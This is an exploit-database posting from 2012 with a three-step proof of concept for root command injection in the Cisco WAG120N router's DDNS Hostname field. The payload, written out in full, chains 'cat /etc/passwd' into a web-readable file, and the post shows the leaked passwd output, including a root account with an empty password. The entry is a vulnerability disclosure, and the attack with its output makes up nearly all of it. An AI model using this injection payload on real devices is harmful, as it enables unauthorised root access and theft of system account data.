Cisco WAG120N Command Execution Vulnerability



EKU-ID: 2815 CVE: OSVDB-ID:
Author: Manuel Fernandez Published: 2012-11-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Hello, here you have a quick POC in three simple steps
 
# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fernández Fernández (thesur@itsm3.com)
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
 
1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3º Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)
 
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
 
-- 
Manuel Fernández